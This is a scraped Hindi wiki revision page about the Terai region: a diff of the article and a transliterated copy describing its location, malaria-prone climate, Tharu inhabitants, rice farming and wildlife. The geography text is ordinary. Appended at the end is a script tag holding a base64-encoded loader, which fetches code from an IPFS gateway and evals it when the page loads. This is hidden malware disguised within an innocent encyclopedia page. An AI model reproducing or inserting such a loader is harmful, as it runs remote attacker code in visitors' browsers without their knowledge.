Difference between revisions of "तराई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''तराई''' वह क्षेत्र है, जिसमें नदियाँ भाभर से निकलकर ...' के साथ नया पन्ना बनाया)
 
Line 5: Line 5:
 
इस क्षेत्र में जनसंख्या दक्षिण की ओर अधिक है। यहाँ पर वर्ष के कुछ समय को छोड़कर शेष में मलेरिया का भयानक प्रकोप बहुत रहता है। यहाँ की जलवायु अस्वास्थ्यकर है। यहाँ थारु इत्यादि जंगली जातियाँ निवास करती हैं। यहाँ पर धान की [[कृषि]] मुख्य रूप से की जाती है। यहाँ नहरों से सिंचाई की भी सुविधा है। यहाँ जंगल अधिक हैं, जिनमें [[हाथी]], चीता, [[भालू]], [[तेंदुआ]] आदि जंगली जानवर निवास करते हैं।
 
इस क्षेत्र में जनसंख्या दक्षिण की ओर अधिक है। यहाँ पर वर्ष के कुछ समय को छोड़कर शेष में मलेरिया का भयानक प्रकोप बहुत रहता है। यहाँ की जलवायु अस्वास्थ्यकर है। यहाँ थारु इत्यादि जंगली जातियाँ निवास करती हैं। यहाँ पर धान की [[कृषि]] मुख्य रूप से की जाती है। यहाँ नहरों से सिंचाई की भी सुविधा है। यहाँ जंगल अधिक हैं, जिनमें [[हाथी]], चीता, [[भालू]], [[तेंदुआ]] आदि जंगली जानवर निवास करते हैं।
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता= |शोध= }}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भूगोल शब्दावली}}
 
{{भूगोल शब्दावली}}

Revision as of 12:39, 22 October 2011

taraee vah kshetr hai, jisamean nadiyaan bhabhar se nikalakar pun: dharatal ke oopar a jati haian. yah atyadhik nami vala kshetr hai, jahaan ghane van tatha vibhinn prakar ke vanyajiv pae jate haian.

sthiti

taraee uttarakhand ke nainital zile ka dakshini bhag hai. jisaki sthiti 28° 45' se 29° 26' uttari akshaansh tatha 78° 5' poorvi deshaantar hai. isaka kshetraphal 776 varg mil hai. taraee ka kshetr ek patti ke roop mean pashchim mean yamuna nadi se lekar poorv mean brahmaputr nadi tak phaila hua hai tatha isaka bahut b da bhag nepal mean p data hai. isake uttari kinare par, jahaan bhabhar ka aant hota hai, sete pae jate haian. ghaghara taraee ki sabase b di evan mukhy nadi hai tatha kafi door tak naugamy bhi hai.

janasankhya tatha jalavayu

is kshetr mean janasankhya dakshin ki or adhik hai. yahaan par varsh ke kuchh samay ko chho dakar shesh mean maleriya ka bhayanak prakop bahut rahata hai. yahaan ki jalavayu asvasthyakar hai. yahaan tharu ityadi jangali jatiyaan nivas karati haian. yahaan par dhan ki krishi mukhy roop se ki jati hai. yahaan naharoan se sianchaee ki bhi suvidha hai. yahaan jangal adhik haian, jinamean hathi, chita, bhaloo, teandua adi jangali janavar nivas karate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>